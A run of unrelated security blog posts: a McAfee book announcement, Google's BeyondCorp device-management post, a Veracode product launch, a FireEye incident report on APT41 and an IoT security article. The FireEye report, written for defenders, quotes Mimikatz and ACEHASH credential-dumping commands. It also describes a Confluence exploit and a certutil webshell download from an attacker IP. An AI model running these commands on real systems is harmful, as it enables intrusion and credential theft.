I didn’t intend to ruin that Easter Sunday for my colleagues. There was nothing I wanted less than to call my CEO and peers and spoil their holiday with the news. And, I didn’t relish having to notify all our employees of the same the following Monday. It wasn’t that I was legally obligated to let anyone know of the hack; after all, McAfee’s systems were never in jeopardy. But our brand reputation took a hit that day, and our employees deserved to know that their CMO had let her guard down just long enough for an opportunistic hacker to strike.

I tell you this story not out of self-flagellation or so that you can feel, “Hey, better her than me!” I share this story because it’s a microcosm of why I wrote a book, The Cybersecurity Playbook: How Every Leader and Employee Can Contribute to a Culture of Security.

I’m not alone in having experienced an unfortunate hack that might have been prevented had my team and I been more diligent in practicing the habits that minimize such risks. Every day, organizations are attacked the world over. And, behind every hack, there’s a story. There’s hindsight of what might have been done to avoid it. While the attack on that Easter Sunday was humbling, the way in which my McAfee teammates responded, and the lessons we learned, were inspirational.

I realized in the aftermath that there’s a real need for a playbook that gives every employee—from the frontline worker to the board director—a prescription for strong cybersecurity hygiene. I realized that everyone can play an indispensable role in protecting her organization from attack. And, I grasped that common sense is not always common practice.

There’s no shortage of cybersecurity books available for your consumption from reputable, talented authors with a variety of experiences. You’ll find some from journalists, who have dissected some of the most legendary breaches in history. You’ll find others from luminaries, who speak with authority as being venerable forefathers of the industry. And you’ll find more still from technical experts, who decipher the intricate elements of cybersecurity in significant detail.

But, you won’t find many from marketers. So why trust this marketer with a topic of such gravity? Because this marketer not only works for a company that has its origins in cybersecurity but found herself on her heels that fateful Easter Sunday. I know what it’s like to have to respond—and respond fast—when time is not on your side and your reputation is in the hands of a hacker. And, while McAfee certainly had a playbook to act accordingly, I realized that every company should have the same.

So, whether you’re in marketing, human resources, product development, IT or finance—or a board member, CEO, manager or individual contributor—this book gives you a playbook to incorporate cybersecurity habits in your routine. I’m not so naïve as to believe that cybersecurity will become everyone’s primary job. But, I know that cybersecurity is now too important to be left exclusively in the hands of IT. And, I am idealistic enough to envision a workplace where sound cybersecurity practice becomes so routine that all employees regularly do their part to collectively improve the defenses of their organization. I hope this book empowers action; your organization needs you in this fight.

Allison Cerra’s book, The Cybersecurity Playbook: How Every Leader and Employee Can Contribute to a Culture of Security, is scheduled to be released September 12, 2019 and can be preordered at amazon.com.

The post The Cybersecurity Playbook: Why I Wrote a Cybersecurity Book appeared first on McAfee Blogs.

How Google adopted BeyondCorp: Part 2 (devices)




Intro

This is the second post in a series of four, in which we set out to revisit various BeyondCorp topics and share lessons that were learnt along the internal implementation path at Google.

The first post in this series focused on providing the necessary context for how Google adopted BeyondCorp. This post will focus on managing devices - how we decide whether or not a device should be trusted, and why that distinction is necessary. Device management provides both the data and the guarantees required for making access decisions, by securing endpoints and providing additional context about them.


How do we manage devices?

At Google, we use the following principles to run our device fleet securely and at scale:
  • Secure default settings at depth with central enforcement
  • Ensure a scalable process
  • Invest in fleet testing, monitoring, and phased rollouts
  • Ensure high quality data
Secure default settings

Defense in depth requires us to layer our security defenses such that an attacker would need to bypass multiple controls in an attack. To uphold this defensive position at scale, we centrally manage and measure various qualities of our devices, covering all layers of the platform:

  • Hardware/firmware configuration
  • Operating system and software
  • User settings and modifications
We use automated configuration management systems to continuously enforce our security and compliance policies. Independently, we observe the state of our hardware and software. This allows us to determine divergence from the expected state and verify whether it is an anomaly.
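The enforce-then-observe loop can be sketched roughly as follows. The policy keys and device structure here are invented for illustration; Google's actual tooling is not public:

```python
# Hypothetical enforced policy; a real system would pull this from the
# configuration management pipeline rather than a hard-coded dict.
EXPECTED_POLICY = {
    "disk_encryption": "enabled",
    "screen_lock_timeout_s": 300,
    "os_autoupdate": "enabled",
}

def find_divergence(observed: dict) -> dict:
    """Compare observed device state against the enforced policy and
    return {setting: (expected, observed)} for every mismatch."""
    return {
        key: (want, observed.get(key))
        for key, want in EXPECTED_POLICY.items()
        if observed.get(key) != want
    }

# A device whose screen-lock timeout drifted from policy is flagged;
# divergent settings can then be re-converged or reviewed as anomalies.
anomalies = find_divergence({
    "disk_encryption": "enabled",
    "screen_lock_timeout_s": 900,
    "os_autoupdate": "enabled",
})
assert anomalies == {"screen_lock_timeout_s": (300, 900)}
```

The key design point mirrored here is that enforcement and observation are independent, so a divergence is detectable even if the enforcement agent itself is broken.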

Where possible, our platforms use native OS capabilities to protect against malicious software, and we extend those capabilities across our platforms with custom and commercial tooling.


Scalable process

Google manages a fleet of several hundred thousand client devices (workstations, laptops, mobile devices) for employees who are spread across the world. We scale the engineering teams who manage these devices by relying on reviewable, repeatable, and automated backend processes and minimizing GUI-based configuration tools. By using and developing open-source software and integrating it with internal solutions, we reach a level of flexibility that allows us to manage fleets at scale without sacrificing customizability for our users. The focus is on operating system agnostic server and client solutions, where possible, to avoid duplication of effort.

Software for all platforms is provided by repositories which verify the integrity of software packages before making them available to users. The same system is used for distributing configuration settings and management tools, which enforce policies on client systems using the open-source configuration management system Puppet, running in standalone mode. In combination, this allows us to easily scale infrastructure and management horizontally as described in more detail and with examples in one of our BeyondCorp whitepapers, Fleet Management at Scale.
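Integrity verification of the kind these repositories perform can be sketched as a digest check before a package is served. The manifest format and function names below are illustrative, standing in for repository metadata produced by a trusted build pipeline:

```python
import hashlib

# Hypothetical manifest mapping package names to trusted SHA-256 digests,
# a stand-in for signed repository metadata from the build pipeline.
TRUSTED_DIGESTS = {
    "editor-1.2.0": hashlib.sha256(b"editor-package-contents").hexdigest(),
}

def verify_package(name: str, contents: bytes) -> bool:
    """Only serve a package whose digest matches the trusted manifest."""
    expected = TRUSTED_DIGESTS.get(name)
    return (expected is not None
            and hashlib.sha256(contents).hexdigest() == expected)

assert verify_package("editor-1.2.0", b"editor-package-contents")
assert not verify_package("editor-1.2.0", b"tampered-contents")
```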

All device management policies are stored in centralized systems which allow settings to be applied both at the fleet and the individual device level. This way policy owners and device owners can manage sensible defaults or per-device overrides in the same system, allowing audits of settings and exceptions. Depending on the type of exception, they may either be managed self-service by the user, require approval from appropriate parties, or affect the trust level of the affected device. This way, we aim to guarantee user satisfaction and security simultaneously.
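The layering of fleet-wide defaults and audited per-device exceptions can be modeled as a simple merged lookup. The field names are invented for illustration:

```python
def effective_policy(fleet_defaults: dict, device_overrides: dict) -> dict:
    """Per-device overrides win over fleet defaults; keeping both layers
    in one merged view keeps exceptions visible and auditable."""
    merged = dict(fleet_defaults)
    merged.update(device_overrides)
    return merged

fleet = {"usb_storage": "blocked", "screen_lock": "required"}
overrides = {"usb_storage": "allowed"}  # e.g., an approved exception
assert effective_policy(fleet, overrides) == {
    "usb_storage": "allowed",
    "screen_lock": "required",
}
```

Because the override layer is stored separately from the defaults, an auditor can enumerate every exception in the fleet without diffing each device's full policy.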


Fleet testing, monitoring, and phased rollouts

Applying changes at scale to a large heterogeneous fleet can be challenging. At Google, we have automated test labs which allow us to test changes before we deploy them to the fleet. Rollouts to the client fleet usually follow multiple stages and random canarying, similar to common practices with service management. Furthermore, we monitor various status attributes of our fleet which allows us to detect issues before they spread widely.
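Random canarying with stable assignment can be sketched by hashing a device identifier into a rollout bucket, so a device stays in the same stage across evaluations and regressions can be attributed to the canary population. The bucketing scheme below is illustrative, not Google's actual implementation:

```python
import hashlib

def rollout_bucket(device_id: str) -> int:
    """Map a device id to a stable bucket in [0, 100)."""
    digest = hashlib.sha256(device_id.encode()).digest()
    return int.from_bytes(digest[:4], "big") % 100

def in_rollout(device_id: str, stage_percent: int) -> bool:
    """A change at stage_percent reaches only devices whose bucket falls
    below the threshold; raising the threshold widens the rollout."""
    return rollout_bucket(device_id) < stage_percent

# Assignment is deterministic: the same device lands in the same bucket
# every time, so monitoring can watch the canary population before
# promoting the change to a wider stage.
assert in_rollout("laptop-1234", 100)      # full rollout includes everyone
assert not in_rollout("laptop-1234", 0)    # 0% includes no one
```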

High quality data

Device management depends on the quality of device data. Both configuration and trust decisions are keyed off inventory information. At Google, we track all devices in centralized asset management systems. This allows us not only to observe the current (runtime) state of a device, but also to verify whether it’s a legitimate Google device. These systems store hardware attributes as well as the assignment and status of devices, which lets us match and compare prescribed values to those which are observed.

Prior to implementing BeyondCorp, we performed a fleet-wide audit to ensure the quality of inventory data, and we perform smaller audits regularly across the fleet. Automation is key to achieving this, both for entering data initially and for detecting divergence at later points. For example, instead of having a human enter data into the system manually, we use digital manifests and barcode scanners as much as possible.


How do we figure out whether devices are trustworthy?

After appropriate management systems have been put in place, and data quality goals have been met, the pertinent security information related to a device can be used to make a "trust" decision as to whether a given action should be allowed from the device.



High level architecture for BeyondCorp


This decision can be most effectively made when an abundance of information about the device is readily available. At Google, we use an aggregated data pipeline to gather information from various sources, which each contain a limited subset of knowledge about a device and its history, and make this data available at the point when a trust decision is being made.
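Conceptually, the aggregation can be sketched as joining per-source records on a device identifier and deriving a trust verdict from the combined view. The sources, fields, and criteria below are invented for illustration; the real pipeline and its signals are internal to Google:

```python
# Hypothetical per-source records, each holding a partial view of a device.
inventory = {"dev-42": {"owner": "alice", "managed": True}}
vuln_scans = {"dev-42": {"critical_vulns": 0}}
mgmt_state = {"dev-42": {"disk_encryption": True, "os_patched": True}}

def aggregate(device_id: str) -> dict:
    """Merge what each source knows about the device into one record."""
    merged = {}
    for source in (inventory, vuln_scans, mgmt_state):
        merged.update(source.get(device_id, {}))
    return merged

def is_trusted(device_id: str) -> bool:
    """An illustrative trust rule over the aggregated record; a device
    absent from the sources yields an empty record and is not trusted."""
    d = aggregate(device_id)
    return bool(d.get("managed") and d.get("disk_encryption")
                and d.get("os_patched") and d.get("critical_vulns") == 0)

assert is_trusted("dev-42")
assert not is_trusted("unknown-device")  # no data means no trust
```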

Various systems and repositories are employed within Google to perform collection and storage of device data that is relevant to security. These include tools like asset management repositories, device management solutions, vulnerability scanners, and internal directory services, which contain information and state about the multitude of physical device types (e.g., desktops, laptops, phones, tablets), as well as virtual desktops, used by employees at the company.

Having data from these various types of information systems available when making a trust decision for a given device can certainly be advantageous. However, challenges can present themselves when attempting to correlate records from a diverse set of systems which may not have a clear, consistent way to reference the identity of a given device. The challenge of implementation has been offset by the gains in security policy flexibility and improvements in securing our data.


What lessons did we learn?
As we rolled out BeyondCorp, we iteratively improved our fleet management and inventory processes as outlined above. These improvements are based on various lessons we learned around data quality challenges.

Audit your data ahead of implementing BeyondCorp

Data quality issues and inaccuracies are almost certain to be present in any asset management system of substantial size, and they must be corrected before the data is used in a way that significantly affects user experience. Comparing values that have been manually entered into such systems against similar data collected automatically from devices allows discrepancies, which could otherwise interrupt the intended behavior of the system, to be found and corrected.


Prepare to encounter unforeseen data quality challenges

Numerous data-incorrectness scenarios and challenging issues are likely to present themselves as reliance on accurate data increases. For example, be prepared to encounter issues with data ingestion processes that rely on transcribing device identifier information physically labeled on devices or their packaging, which may differ from the identifier data digitally imprinted on the device.

In addition, over-reliance on the assumed uniqueness of certain device identifiers can be problematic in the rare cases where conventionally unique attributes, like serial numbers, appear more than once in the device fleet (this is especially pronounced with virtual desktops, where such identifiers may be chosen by a user without regard for uniqueness).

Lastly, routine maintenance and hardware replacements performed on employee devices can result in ambiguous situations with regard to the "identity" of a device. When internal device components, like network adapters or mainboards, are found to be defective and replaced, the device's identity can drift into a state that no longer matches the known inventory data if care is not taken to correctly reflect such changes.


Implement controls to maintain high quality asset inventory

After inventory data has been brought to an acceptable correctness level, mechanisms should be put into place to limit the ability for new inaccuracies to be introduced. For example, at Google, data correctness checks have been integrated into the provisioning process for new devices so that inventory records must be correct before a device can be successfully imaged with an operating system, ensuring that the device will meet required data accuracy standards before being delivered to an employee.
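The provisioning-time correctness check can be sketched as a gate that blocks imaging until the inventory record is complete and agrees with identifiers the device itself reports. The required fields and record shape are illustrative only:

```python
# Hypothetical set of inventory fields that must be populated
# before a device may be imaged.
REQUIRED_FIELDS = ("serial", "asset_tag", "model", "assigned_owner")

def ok_to_image(inventory_record: dict, device_reported: dict) -> bool:
    """Refuse to image a device whose inventory record is incomplete
    or disagrees with identifiers read from the hardware itself."""
    if any(not inventory_record.get(f) for f in REQUIRED_FIELDS):
        return False  # incomplete record
    # Identifiers transcribed into inventory must match what the
    # device reports, catching transcription errors at provisioning time.
    return inventory_record["serial"] == device_reported.get("serial")

record = {"serial": "SN123", "asset_tag": "A-9",
          "model": "X1", "assigned_owner": "bob"}
assert ok_to_image(record, {"serial": "SN123"})
assert not ok_to_image(record, {"serial": "SN999"})  # mismatch
```

Gating at provisioning time means bad records are fixed before the device reaches an employee, instead of surfacing later as a denied access decision.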

Next time
In the next post in this series, we will discuss a tiered access approach, how to create rule-based trust and the lessons we’ve learned through that process.

In the meantime, if you want to learn more, you can check out the BeyondCorp research papers. In addition, getting started with BeyondCorp is now easier using zero trust solutions from Google Cloud (context-aware access) and other enterprise providers.

Thank you to the editors of the BeyondCorp blog post series, Puneet Goel (Product Manager), Lior Tishbi (Program Manager), and Justin McWilliams (Engineering Manager).

OpenSAT19 Workshop

The workshop is for developers to share their experiences with Speech Activity Detection (SAD), Automated Speech Recognition (ASR), and Keyword Search (KWS) algorithms or systems when applied to the data.

Introducing the New Veracode Software Composition Analysis

Veracode Software Composition Analysis Announcement

Open source technology empowers developers to make software better, faster, and more efficiently as they push the envelope and delight users with desired features and functionality. This is a trend that is unlikely to fade – at least not in the foreseeable future – and has further fueled our passion for securing the world’s software. This is also why Veracode acquired SourceClear – we had a vision for the impact that integrating our software composition analysis (SCA) technologies would have on our customers’ ability to develop bold, revolutionary software using open source code – without risking their security posture.

Today, our customers have access to an industry-leading, scalable SCA solution that provides unparalleled support for SCA in DevSecOps environments through the cloud-based Veracode Application Security Platform. Veracode SCA offers a unique vulnerable method detection technology that increases the actionability of SCA scan results, as well as the ability to receive continuous alerts on new or updated vulnerabilities without rescanning an application.

Further, our solution relies on a proprietary library and vulnerability database, built using true machine learning and data mining, which has the ability to identify vulnerabilities not available in the National Vulnerability Database (NVD). In addition to CVEs, the database now also includes Reserved CVEs and No-CVEs detected with our data mining and machine learning models. These results are verified by our expert data research team for all supported languages.

Software Composition Analysis for DevSecOps Environments

Veracode SCA offers remediation guidance, SaaS-based scalability, and integration with Continuous Integration tools to provide users with visibility into all direct and indirect open source libraries in use, known and unknown vulnerabilities in those libraries, and how they impact applications, without slowing down development velocity. 

Additionally, it is the only solution on the market that offers two ways to start an SCA scan, each providing insight into open source vulnerabilities, library versions, and licenses:

Scan via Application Binary Upload

Through the traditional application upload process, you’re able to upload your applications or binaries to the Veracode Application Security Platform so that you can run scans via the UI or an API.

SCA scans continue to run alongside Veracode Static Analysis. During the pre-scan evaluation for static scanning, Veracode executes the SCA scan to review the application’s composition, and the results are delivered while the static scan continues. Bill of materials, scores, policy definition, and open source license detection remain available for those application upload scans.

Veracode has also added language support for applications developed in Golang, Ruby, Python, PHP, Scala, Objective-C, and Swift, in addition to the existing support for Java, JavaScript, Node.js, and .NET applications.

Agent-Based Scanning

Agent-based scanning, integrated within the Veracode Application Security Platform, enables you to scan your source code repositories directly, either manually from the command line or in a Continuous Integration pipeline. The agent-based scanning process has been enhanced to detect more open source license types in open source libraries. The library and vulnerability database now detects more vulnerabilities, and project scans can be linked with application profiles for policy compliance, reporting, and PDF reports. Customers using Veracode SCA agent-based scanning can conduct:

  • Vulnerable Method Detection: Pinpoint the line of code where developers can determine if their code is calling on the vulnerable part of the open source library. 
  • Auto Pull Requests: Veracode SCA identifies vulnerabilities and makes recommendations for using a safer version of the library. This feature automatically generates pull requests ready to be merged with your code in GitHub, GitHub Enterprise, or GitLab. It provides the fix for you.
  • Container Scanning: Scan Docker containers and container images for open source vulnerabilities in Linux distributions and base libraries. 

Users have the flexibility to use both scanning types for the same application. Agent-based scanning can be used during development, and a traditional binary upload scan can be conducted before the application is put into production. Scan results continue to be assessed against the chosen policy and prompt users to take action based on the results. These actions can be automated with integration to Jenkins (or another Continuous Integration tool) to either break the build because of a failed policy scan, or to simply report the failed policy.
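The break-the-build pattern described above can be sketched as a small CI gate. The result shape and severity threshold here are illustrative assumptions, not Veracode's actual API format:

```python
# Hypothetical CI gate: read a scan result (here a plain dict; in practice
# the JSON your SCA tool's API returns) and fail the build when findings
# above the policy's severity threshold are present.
def build_should_fail(scan_result: dict, max_severity: int = 3) -> bool:
    findings = scan_result.get("findings", [])
    return any(f["severity"] > max_severity for f in findings)

def gate(scan_result: dict) -> int:
    # Return a process exit code: non-zero breaks the CI build.
    if build_should_fail(scan_result):
        print("Policy scan failed: high-severity open source findings present")
        return 1
    print("Policy scan passed")
    return 0
```

A Jenkins step would simply run a script like this after the scan and let the non-zero exit code break the build; a report-only mode would log the failure but always return zero.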

It’s no exaggeration to say that every company is becoming a software company, and the adoption of open source is on the rise. Having clear visibility into the open source components within your application portfolio reduces the risk of breach through vulnerabilities. The new Veracode Software Composition Analysis solution helps our customers confidently use open source components without introducing unnecessary risk. 

To learn more about Veracode Software Composition Analysis, download the technical whitepaper, “Accelerating Software Development with Secure Open Source Software.”

GAME OVER: Detecting and Stopping an APT41 Operation

In August 2019, FireEye released the “Double Dragon” report on our newest graduated threat group, APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes and detections within victim environments, often recompiling malware within hours of incident responder activity. In multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponizing and exploiting them within a matter of days.

Our knowledge of this group’s targets and activities is rooted in our Incident Response and Managed Defense services, where we encounter actors like APT41 on a regular basis. At each encounter, FireEye works to reverse malware, collect intelligence, and hone our detection capabilities. This ultimately feeds back into our Managed Defense and Incident Response teams detecting and stopping threat actors earlier in their campaigns.

In this blog post, we’re going to examine a recent instance where FireEye Managed Defense came toe-to-toe with APT41. Our goal is to display not only how dynamic this group can be, but also how the various teams within FireEye worked to thwart attacks within hours of detection – protecting our clients’ networks and limiting the threat actor’s ability to gain a foothold and/or prevent data exposure.

GET TO DA CHOPPA!

In April 2019, FireEye’s Managed Defense team identified suspicious activity on a publicly-accessible web server at a U.S.-based research university. This activity, a snippet of which is provided in Figure 1, indicated that the attackers were exploiting CVE-2019-3396, a vulnerability in Atlassian Confluence Server that allowed for path traversal and remote code execution.


Figure 1: Snippet of PCAP showing attacker attempting CVE-2019-3396 vulnerability

This vulnerability relies on the following actions by the attacker:

  • Customizing the _template field to utilize a template that allowed for command execution.
  • Inserting a cmd field that provided the command to be executed.

Through custom JSON POST requests, the attackers were able to run commands and force the vulnerable system to download an additional file. Figure 2 provides a list of the JSON data sent by the attacker.


Figure 2: Snippet of HTTP POST requests exploiting CVE-2019-3396
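As an illustration of the request shape described above, a network monitor could flag JSON bodies that combine a remote `_template` URL with a `cmd` field. This is a hypothetical detection sketch, not a FireEye signature; the helper name and URL-scheme check are our own assumptions:

```python
import json

# Illustrative detector for CVE-2019-3396-style exploitation attempts:
# a JSON body whose "_template" points at a remote Velocity template
# and which also carries a "cmd" field with the command to execute.
def looks_like_cve_2019_3396(body: str) -> bool:
    try:
        data = json.loads(body)
    except (ValueError, TypeError):
        return False
    if not isinstance(data, dict):
        return False
    template = str(data.get("_template", ""))
    remote_template = template.startswith(("http://", "https://", "ftp://"))
    return remote_template and "cmd" in data
```

Legitimate Confluence requests reference local templates, so the remote-URL condition keeps the false-positive rate low while still catching variations on the public exploit.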

As shown in Figure 2, the attacker utilized a template located at hxxps[:]//github[.]com/Yt1g3r/CVE-2019-3396_EXP/blob/master/cmd.vm. This publicly-available template provided a vehicle for the attacker to issue arbitrary commands against the vulnerable system. Figure 3 provides the code of the file cmd.vm.


Figure 3: Code of cmd.vm, used by the attackers to execute code on a vulnerable Confluence system

The HTTP POST requests in Figure 2, which originated from the IP address 67.229.97[.]229, performed system reconnaissance and utilized Windows certutil.exe to download a file located at hxxp[:]//67.229.97[.]229/pass_sqzr.jsp and save it as test.jsp (MD5: 84d6e4ba1f4268e50810dacc7bbc3935). The file test.jsp was ultimately identified to be a variant of a China Chopper webshell.
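A simple way to hunt for this certutil abuse is to flag any certutil command line that also contains a URL, since the utility rarely has legitimate business fetching remote files in most environments. A rough, assumption-laden sketch (the heuristic and names are ours):

```python
import re

# Flag process command lines where certutil is invoked with a URL, the
# pattern abused here to fetch a webshell. Attacker invocations commonly
# use -urlcache and -split, but any certutil + URL combination is worth
# reviewing in most environments.
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

def is_suspicious_certutil(cmdline: str) -> bool:
    lowered = cmdline.lower()
    return "certutil" in lowered and bool(URL_RE.search(cmdline))
```

Run against endpoint process-creation logs, a check like this would have surfaced the download of pass_sqzr.jsp the moment it executed.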

A Passive Aggressive Operation

Shortly after placing test.jsp on the vulnerable system, the attackers downloaded two additional files onto the system:

  • 64.dat (MD5: 51e06382a88eb09639e1bc3565b444a6)
  • Ins64.exe (MD5: e42555b218248d1a2ba92c1532ef6786)

Both files were hosted at the same IP address utilized by the attacker, 67[.]229[.]97[.]229. The file Ins64.exe was used to deploy the HIGHNOON backdoor on the system. HIGHNOON is a backdoor that consists of multiple components, including a loader, dynamic-link library (DLL), and a rootkit. When loaded, the DLL may deploy one of two embedded drivers to conceal network traffic and communicate with its command and control server to download and launch memory-resident DLL plugins. This particular variant of HIGHNOON is tracked as HIGHNOON.PASSIVE by FireEye. (An exploration of passive backdoors and more analysis of the HIGHNOON malware family can be found in our full APT41 report).

Within the next 35 minutes, the attackers utilized both the test.jsp web shell and the HIGHNOON backdoor to issue commands to the system. As China Chopper relies on HTTP requests, attacker traffic to and from this web shell was easily observed via network monitoring. The attacker utilized China Chopper to perform the following:

  • Movement of 64.dat and Ins64.exe to C:\Program Files\Atlassian\Confluence
  • Performing a directory listing of C:\Program Files\Atlassian\Confluence
  • Performing a directory listing of C:\Users
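Because China Chopper traffic is plain HTTP, even a crude network heuristic can surface activity like the above: POSTs to a .jsp resource whose body contains OS command strings. The keyword list and function name below are illustrative assumptions, not FireEye signatures:

```python
# Toy heuristic for web-shell command traffic: a POST to a JSP endpoint
# whose parameters carry Windows command fragments. Real detections use
# richer signatures, but this captures the observable pattern described
# in the post.
COMMAND_HINTS = ("cmd.exe", "whoami", "dir ", "ipconfig", "net user")

def flag_possible_webshell_post(uri: str, body: str) -> bool:
    if not uri.lower().endswith(".jsp"):
        return False
    lowered = body.lower()
    return any(hint in lowered for hint in COMMAND_HINTS)
```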

Additionally, FireEye’s FLARE team reverse engineered the custom protocol utilized by the HIGHNOON backdoor, allowing us to decode the attacker’s traffic. Figure 4 provides a list of the various commands issued by the attacker utilizing HIGHNOON.


Figure 4: Decoded HIGHNOON commands issued by the attacker

Playing Their ACEHASH Card

As shown in Figure 4, the attacker utilized the HIGHNOON backdoor to execute a PowerShell command that downloaded a script from PowerSploit, a well-known PowerShell Post-Exploitation Framework. At the time of this blog post, the script was no longer available for downloading. The commands provided to the script – “privilege::debug sekurlsa::logonpasswords exit exit” – indicate that the unrecovered script was likely a copy of Invoke-Mimikatz, reflectively loading Mimikatz 2.0 in-memory. Per the observed HIGHNOON output, this command failed.

After performing some additional reconnaissance, the attacker utilized HIGHNOON to download two additional files into the C:\Program Files\Atlassian\Confluence directory:

  • c64.exe (MD5: 846cdb921841ac671c86350d494abf9c)
  • F64.data (MD5: a919b4454679ef60b39c82bd686ed141)

These two files are the dropper and encrypted/compressed payload components, respectively, of a malware family known as ACEHASH. ACEHASH is a credential theft and password dumping utility that combines the functionality of multiple tools such as Mimikatz, hashdump, and Windows Credential Editor (WCE).

Upon placing c64.exe and F64.data on the system, the attacker ran the command

c64.exe f64.data "9839D7F1A0 -m"

This specific command provided a password of “9839D7F1A0” to decrypt the contents of F64.data, and a switch of “-m”, indicating the attacker wanted to replicate the functionality of Mimikatz. With the correct password provided, c64.exe loaded the decrypted and decompressed shellcode into memory and harvested credentials.

Ultimately, the attacker was able to exploit a vulnerability, execute code, and download custom malware on the vulnerable Confluence system. While Mimikatz failed, via ACEHASH they were able to harvest a single credential from the system. However, as Managed Defense detected this activity rapidly via network signatures, this operation was neutralized before the attackers progressed any further.

Key Takeaways From This Incident

  • APT41 utilized multiple malware families to maintain access into this environment; impactful remediation requires full scoping of an incident.
  • For effective Managed Detection & Response services, having coverage of both Endpoint and Network is critical for detecting and responding to targeted attacks.
  • Attackers may weaponize vulnerabilities quickly after their release, especially if they are present within a targeted environment. Patching of critical vulnerabilities ASAP is crucial to deter active attackers.

Detecting the Techniques

FireEye detects this activity across our platform, including detection for certutil usage, HIGHNOON, and China Chopper.

Detection

The following signature names cover each family:

  • China Chopper: FE_Webshell_JSP_CHOPPER_1, FE_Webshell_Java_CHOPPER_1, FE_Webshell_MSIL_CHOPPER_1
  • HIGHNOON.PASSIVE: FE_APT_Backdoor_Raw64_HIGHNOON_2, FE_APT_Backdoor_Win64_HIGHNOON_2
  • Certutil Downloader: CERTUTIL.EXE DOWNLOADER (UTILITY), CERTUTIL.EXE DOWNLOADER A (UTILITY)
  • ACEHASH: FE_Trojan_AceHash

Indicators

  • File: test.jsp (MD5: 84d6e4ba1f4268e50810dacc7bbc3935)
  • File: 64.dat (MD5: 51e06382a88eb09639e1bc3565b444a6)
  • File: Ins64.exe (MD5: e42555b218248d1a2ba92c1532ef6786)
  • File: c64.exe (MD5: 846cdb921841ac671c86350d494abf9c)
  • File: F64.data (MD5: a919b4454679ef60b39c82bd686ed141)
  • IP Address: 67.229.97[.]229 (no associated hash)

Looking for more? Join us for a webcast on August 29, 2019 where we detail more of APT41’s activities. You can also find a direct link to the public APT41 report here.

Acknowledgements

Special thanks to Dan Perez, Andrew Thompson, Tyler Dean, Raymond Leong, and Willi Ballenthin for identification and reversing of the HIGHNOON.PASSIVE malware.

IoT Security in 2019: Things You Need to Know

In recent years, IoT has been on the rise, with billions of new devices getting connected each year. The increase in connectivity is happening across markets and business sectors, providing new functionality and opportunities. But as devices get connected, they also become unprecedentedly exposed to the threat of cyberattacks. While the IoT security industry is still taking shape, the solution is not yet clear. In this article, we review the latest must-knows about IoT visibility and security, and dive into new approaches to securing the IoT revolution.

IoT visibility & security in 2019:

1. IoT endpoint security vs network security

Securing IoT devices is a real challenge. IoT devices are highly diverse, with a wide variety of operating systems (real-time operating systems, Linux-based, or bare-metal), communication protocols, and architectures. On top of this diversity come the problems of constrained resources and a lack of industry standards and regulations. Most security solutions today focus on securing the network (discovering network anomalies and achieving visibility into the IoT devices active on it), while the understanding that the devices themselves must be protected is only now taking hold. Because IoT devices can be easily exploited, they make an attractive target for attackers aiming to use a weak device as an entry point into the entire enterprise network without being caught. It is also important to remember that network solutions are irrelevant for distributed IoT devices (e.g., home medical devices), which have no network protecting them.

Manufacturers of IoT devices are therefore key to a secure IoT environment, and more and more organizations are willing to pay more for security built into their smart devices.

2. “Cryptography is typically bypassed, not penetrated” (Shamir’s law)

In recent years we have seen a lot of focus on IoT data integrity, which basically means encryption and authentication. Though important in itself, encryption does not mean full security. When focusing mainly on encryption and authentication, companies forget that devices are still exposed to vulnerabilities that can be used to penetrate the device and gain access to the decrypted information, bypassing the authentication and encryption entirely. In other words, what has been known for years in the traditional cyber industry as Shamir’s law should now make its way into the IoT security industry: “Cryptography is typically bypassed, not penetrated.” Companies must therefore invest in securing their devices from cyberattacks, not just in data integrity. To read more, see Sternum IoT Security’s two-part blog post.

3. 3rd party IoT vulnerabilities

One of the main issues in IoT security is the heavy reliance of IoT devices on third-party components: for communication capabilities, cryptographic capabilities, the operating system itself, and more. This reliance is so strong that it is now unlikely you will find an IoT device without third-party components in it. The fact that third-party libraries are commonly used across devices, combined with the difficulty of securing them, makes them a sweet spot for hackers looking for IoT vulnerabilities, since a single flaw can be used to exploit many devices through the same component.

A vulnerability in a third-party component is very dangerous. In many IoT devices there is no separation or segmentation between processes and/or tasks, which means that even one vulnerability in a third-party library compromises the entire device. This can have severe results: attackers can leverage the third-party vulnerability to take control of the device and cause damage, steal information, or perform a ransomware attack on the manufacturer.

It’s not only that third-party components are dangerous; they are also extremely difficult to secure. Many are delivered in binary form, with no source code available. Even when the source code is available, it is often hard to dive into it and assess its security level or the vulnerabilities inside it. Either way, most developers use open-source components as black boxes. On top of that, static analysis tools and compiler security flags lack the ability to analyze and secure third-party components, and most IoT security solutions cannot offer real-time protection for binary code.
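One practical first step toward this visibility problem is comparing a device's software bill of materials against a list of known-vulnerable component versions. A minimal sketch with illustrative data shapes (a real check would match version ranges, not exact versions, and pull advisories from a vulnerability feed):

```python
# Compare a firmware's bill of materials (name, version pairs) against a
# known-vulnerability map keyed by (name, version). Purely illustrative:
# the advisory strings and data shapes are placeholders.
def vulnerable_components(sbom: list, known_vulns: dict) -> list:
    """Return (name, version, advisory) for each component with a known issue."""
    hits = []
    for name, version in sbom:
        advisory = known_vulns.get((name, version))
        if advisory:
            hits.append((name, version, advisory))
    return hits
```

Even this exact-match check gives a manufacturer a starting inventory of which shipped devices embed a flagged library, the question every VxWorks-style disclosure forces teams to answer.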

VxWorks vulnerabilities

A recent example of such a third-party vulnerability affecting millions of devices is the set of security bugs found in the VxWorks embedded operating system. These vulnerabilities exposed every manufacturer using the VxWorks operating system, even where security measures like penetration testing, static analysis, PKI, and firmware analysis were in place.

To summarize: to provide strong and holistic IoT protection, you must handle and secure all parts of the device, including the third-party components. Sternum’s IoT security solution focuses on holistically securing IoT devices from within, and therefore offers the unique capability of embedding security protection and visibility into the device end-to-end. It also operates during real-time execution of the device and prevents attack attempts at the exact point of exploitation, while immediately alerting on the attack and its origins, including those within third-party libraries.

4. Regulation is kicking in

In the past two years, we have seen a cross-industry effort to create regulations and standards for IoT security. We expect more of these efforts to take shape as real regulations that will obligate manufacturers to comply.

A good and important example is the FDA premarket cybersecurity guidance published last year, which is expected to become formal guidance in 2020. It covers different aspects of cybersecurity in medical devices (which in many cases are essentially IoT devices), such as data integrity, over-the-air updates, real-time protection, execution integrity, third-party liabilities, and real-time monitoring of devices.

